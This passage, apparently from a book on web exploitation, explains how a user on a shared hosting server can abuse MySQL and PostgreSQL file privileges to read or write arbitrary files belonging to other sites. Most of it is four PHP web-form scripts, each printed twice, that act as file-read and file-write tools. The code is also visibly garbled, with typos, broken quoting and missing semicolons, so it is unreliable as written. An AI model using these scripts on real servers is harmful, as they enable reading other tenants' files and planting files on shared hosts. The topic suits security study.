Hosting and Databases | Hacker Web Exploition Uncovered

In addition to running scripts, hosting companies often offer their clients other services, such as accessing their own database from their scripts. With a correct database configuration and a correct authentication procedure based on the login and the password, a user who can access his or her database cannot access the other users' databases.

As described in the previous section, two situations are possible. First, a malicious user is one of the site owners and, therefore, has a full access to his or her site. Second, an attacker has access to a site located on the same physical server as the target site.

In any case, the attacker can perform any actions in the context of the site under control. He or she can make database queries to read any files on the server, including files belonging to the target system. For example, in the MySQL database, the attacker can use the load file construction.

To achieve his or her malicious goal, the attacker needs the user in whose name the attacker establishes a database connection to have access rights to the files, and the files must be available for reading to all users.

In most hosting servers, files belonging to different sites are available for reading to all users. This is done for two reasons. First, most systems by default create files available for reading to all users. Second, files should be available for reading both to their owners and to the user who started the HTTP server. The simplest way to meet these requirements is to allow all users to read the files.

As a result, a user with the access to a database sometimes can use SQL to view the contents of files available to all users for reading. For example, he or she can use the following script to access the MySQL database and output the content of any file.

http://localhost/7/4.php
<? $server="localhost"; $user="root"; $pass=""; $db="bookl"; echo " <html> <body> <form> file name: <input type=text name=file><br> <input type=submit value='output'> </form> "; $file=$_GET['file']; if(!empty($flie)) { mysql_connect($server, $user, $pass); mysql_select_db($db); $sq="select load_file("'.addslashes($file)."') as f"; $q=mysql_query($sq); $s=mysql_error(); if(!empty($s)) { echo "Error: $s"; } else { $r=mysql_fetch_object($q); if (!$r) { echo "empty"; }else { echo "<hr>\r\n".nl2br(htmlspecialchars($r->f))."\r\n<hr>"; } } } echo " </body> </html> ?>

http://localhost/7/4.php

 <? $server="localhost"; $user="root"; $pass=""; $db="bookl"; echo " <html> <body> <form> file name: <input type=text name=file><br> <input type=submit value='output'> </form> "; $file=$_GET['file']; if(!empty($flie)) {  mysql_connect($server, $user, $pass);  mysql_select_db($db);  $sq="select load_file("'.addslashes($file)."') as f";  $q=mysql_query($sq);  $s=mysql_error();  if(!empty($s))  {   echo "Error: $s";  }  else  {    $r=mysql_fetch_object($q);    if (!$r)    {       echo "empty";    }else    {      echo "<hr>\r\n".nl2br(htmlspecialchars($r->f))."\r\n<hr>";    }  } } echo " </body> </html> ?>

To use this method for obtaining the contents of files, the user of the MySQL database who established connection to the database server should have the file_priv access rights.

A user of the PostgreSQL database could use the following script to read the contents of any files.

http://localhost/7/5.php
<? $server="localhost"; $user="pgsql"; $pass=""; $db="testdb"; echo " <html> <body> <form> file name: <input type=text name=file><br> <input type=submit value=' output '> </form> "; $file=$_GET['file']; if(!empty ($file)) { $c=pg_connect("host=$server port=5432 dbname=$db user=$user password=$pass"); $s=pg_last_error(); if (empty ($s)) { pg query($c, "delete from tt"); $s=pg_last_error(); } if(!empty($s)) { echo "Error: $s"; echo " </body> </html> " exit ; } else if (empty($s)) { $sq="copy tt(v) from '".addslashes($file) $q=pg query($c, $sq); $s=pg_last_error(); } if(!empty($s)) { echo "Error: $s"; echo " </body> </html> " ;. exit ; } else if (empty($s)) { $sq="select v from tt"; $q=pg_query($c, $sq); $s=pg_last_error(); } if(!empty ($ s)) { echo "Error: $s"; } else { echo "<hr>\r\n"; while($r=pg_fetch_object($q)) { echo n12br(htmlspecialchars($r->v))."<br>\r\n"; } echo "\r\n<hr>"; } } echo " </body> </html> "; ?>

http://localhost/7/5.php

 <? $server="localhost"; $user="pgsql"; $pass=""; $db="testdb"; echo " <html> <body> <form> file name: <input type=text name=file><br> <input type=submit value=' output '> </form>  ";  $file=$_GET['file']; if(!empty ($file)) {  $c=pg_connect("host=$server port=5432 dbname=$db user=$user password=$pass");  $s=pg_last_error();  if (empty ($s))  {   pg query($c, "delete from tt");   $s=pg_last_error();  }  if(!empty($s))  {   echo "Error: $s";   echo "   </body>   </html>  "  exit ;  }  else  if (empty($s))  {   $sq="copy tt(v) from '".addslashes($file)   $q=pg query($c, $sq);   $s=pg_last_error();  }  if(!empty($s))  {   echo "Error: $s";   echo "   </body>   </html>  "  ;.   exit ;  }  else  if (empty($s))  {   $sq="select v from tt";   $q=pg_query($c, $sq);   $s=pg_last_error();  }  if(!empty ($ s))  {   echo "Error: $s";  }  else  {    echo "<hr>\r\n";    while($r=pg_fetch_object($q))    {      echo n12br(htmlspecialchars($r->v))."<br>\r\n";    }    echo "\r\n<hr>";  } } echo " </body> </html> "; ?>

This script uses the PostgreSQL features of SQL to copy information from one table to another. If the attacker can access the PostgreSQL database with the rights of a user able to manipulate the database, he or she can use this or similar script to obtain the contents of any text files.

In addition, if the attacker can send SQL queries, he or she can create a file (and sometimes edit an existing one) using the rights of the user who established the connection to the database. For example, an attacker who has access to the MySQL database can use the following script

http://localhost/7/6.php
<? $server="localhost"; $user="root"; $pass=""; $db="bookl"; echo " <html> <body> <form method=POST> file name: <input type=text name=file><br> <textarea name=text cols=60 rows=30x/textarea><br> <input type=submit value='write'> </form> "; $file=$_POST['file']; $text=$_POST['text']; if (!empty ($file)) { mysql_connect($server, $user, $pass); mysql_select_db($db); $sq="select '".addslashes($text)."' from testl limit 1 into outfile '".addslashes($file). ^I ""; $q=mysql_query ($sq) ; $q=mysgl query($sq); $s=mysql_error(); if(!empty ($s)) { echo "Error: $s"; } else { echo "<b>Done!</b>"; } } echo " </body> </html> "; ?>

http://localhost/7/6.php

 <? $server="localhost"; $user="root"; $pass=""; $db="bookl"; echo " <html> <body> <form method=POST> file name: <input type=text name=file><br> <textarea name=text cols=60 rows=30x/textarea><br> <input type=submit value='write'> </form>  ";  $file=$_POST['file']; $text=$_POST['text']; if (!empty ($file)) {  mysql_connect($server, $user, $pass);  mysql_select_db($db);  $sq="select '".addslashes($text)."' from testl limit 1 into outfile '".addslashes($file). ^I "";  $q=mysql_query ($sq) ;  $q=mysgl query($sq);  $s=mysql_error();  if(!empty ($s))  {   echo "Error: $s";  }  else  {   echo "<b>Done!</b>";  } } echo " </body> </html> "; ?>

A specific feature of MySQL is that when you write data into a file, this file doesn't need to be present in the system. The directory, to which you write the file, should be available for writing to all users.

A malicious user who has access to the PostgreSQL database can load and execute the following PHP script that uses file features of PostgreSQL to create or edit any file with the rights of a PostgreSQL user.

http://localhost/7/7.php
<? $server="localhost"; $user="pgsql"; $pass=""; $db="testdb"; echo " <html> <body> <form method=POST> file name: <input type=text name=file><br> <textarea name=text cols=60 rows=30></textarea><br> <input type=submit value='write'> </form> " ; $file=$_POST['file']; $text=$_POST['text']; if(!empty ($file)) { $c=pg_connect("host=$server port=5432 dbname=$db user= $user password=$pass"); $s=pg_last_error(); if (empty ($s)) { pg_query($c, "delete from tt"); $s=pg_last_error(); } if(!empty($s)) { echo "Error: $s"; echo " </body> </html> "; exit ; } else { pg_query($c, "delete from tt"); $s=pg_last_error(); } if(!empty($s)) { echo "Error: $s"; echo " </body> </html> " ; exit ; } else { $texts=split($text, "\n"); $sq="insert into tt(v) values('".addslashes($text)."')"; $q=pg_query($c, $sq); $s=pg_last_error(); } if(!empty($s)) { echo "Error: $s"; echo " </body> </html> "; exit ; } else { $sq="copy tt(v) to '".addslashes($file)."'" $q=pg_query($c, $sq); $s=pg_last_error(); } if(!empty($s)) { echo "Error: $s"; echo " </body> </html> "; exit ; } else { echo "<b>Done</b>"; } } echo " </body> </html> ?>

http://localhost/7/7.php

 <? $server="localhost"; $user="pgsql"; $pass=""; $db="testdb"; echo " <html> <body> <form method=POST> file name: <input type=text name=file><br> <textarea name=text cols=60 rows=30></textarea><br> <input type=submit value='write'> </form>  " ;  $file=$_POST['file']; $text=$_POST['text']; if(!empty ($file)) {  $c=pg_connect("host=$server port=5432 dbname=$db user=  $user password=$pass");  $s=pg_last_error();  if (empty ($s))  {   pg_query($c, "delete from tt");   $s=pg_last_error();  }  if(!empty($s))  {   echo "Error: $s";   echo "   </body>   </html>   ";   exit ;  } else {  pg_query($c, "delete from tt");  $s=pg_last_error(); } if(!empty($s)) {  echo "Error: $s";  echo "  </body>  </html>  " ;  exit ; } else {   $texts=split($text, "\n");   $sq="insert into tt(v) values('".addslashes($text)."')";   $q=pg_query($c, $sq);   $s=pg_last_error(); } if(!empty($s)) {  echo "Error: $s";  echo "  </body>  </html>  ";  exit ; } else {   $sq="copy tt(v) to '".addslashes($file)."'"   $q=pg_query($c, $sq);   $s=pg_last_error(); }  if(!empty($s))  {   echo "Error: $s";   echo "   </body>   </html>  ";  exit ;  }  else  {   echo "<b>Done</b>";  } } echo " </body> </html>  ?>

This is how a malicious user with access to a database can manipulate any files in the system using the rights granted to him or her by the database. This person can be either a malicious client of the hosting company or an attacker who used a vulnerability to gain control over a site on the hosting server.